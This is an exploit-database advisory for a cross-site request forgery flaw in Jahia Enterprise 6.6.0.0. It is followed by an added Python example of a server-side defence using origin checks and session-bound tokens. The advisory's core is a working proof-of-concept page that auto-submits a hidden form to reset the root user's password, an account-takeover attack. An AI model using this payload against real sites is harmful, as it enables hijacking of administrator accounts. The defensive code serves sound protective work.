Jahia Enterprise v6.6.0.0 CSRF Vulnerability

2012-12-09T00:00:00
ID 1337DAY-ID-19925
Type zdt
Reporter D4RKCR1PT3R
Modified 2012-12-09T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            A.B.C.D = URL, EXAMPLE: http://localhost:8080/cms/en/users/root.changePassword.do
<html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to change Password</H2>
 <form method="POST" name="form0" action="A.B.C.D">
 <input type="hidden" name="password" value="password"/>
 <input type="hidden" name="passwordconfirm" value="password"/>
</form>
 </body>
</html>

#  0day.today [2016-04-20]  #
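
A server-side check that rejects the auto-submitted form above, shown as an added example: it is not Jahia's code and not part of the original advisory. The trusted origin is taken from the example URL; the `csrf_token` field name, the HMAC-derived token and the sample requests are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the advisory): the "csrf_token" field name and a
# per-deployment secret that derives each token from the session id.
TRUSTED_ORIGIN = "http://localhost:8080"  # origin of the page's example URL
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Token the server embeds in its own change-password form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Compare Origin (or, failing that, Referer) with the trusted origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when neither header is present
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_password_change(session_id: str, headers: dict, form: dict) -> tuple:
    """Return (allowed, reason) for a POST to the change-password action."""
    if not same_origin(headers):
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    if form.get("password") != form.get("passwordconfirm"):
        return False, "passwords do not match"
    return True, "ok"


# Constructed sample requests; each is assumed to carry a valid session cookie.
SESSION = "constructed-session-id"
FIELDS = {"password": "password", "passwordconfirm": "password"}
# Shape of the auto-submitted form: two fields, foreign origin, no token.
forged = ({"Origin": "http://attacker.example"}, dict(FIELDS))
# Passes the origin check but still lacks the token.
tokenless = ({"Origin": TRUSTED_ORIGIN}, dict(FIELDS))
legitimate = ({"Origin": TRUSTED_ORIGIN}, {**FIELDS, "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for name, (headers, form) in [("forged", forged), ("tokenless", tokenless), ("legitimate", legitimate)]:
        print(name, allow_password_change(SESSION, headers, form))
```

The token is bound to the session id, so a token issued for one session is rejected when replayed under another.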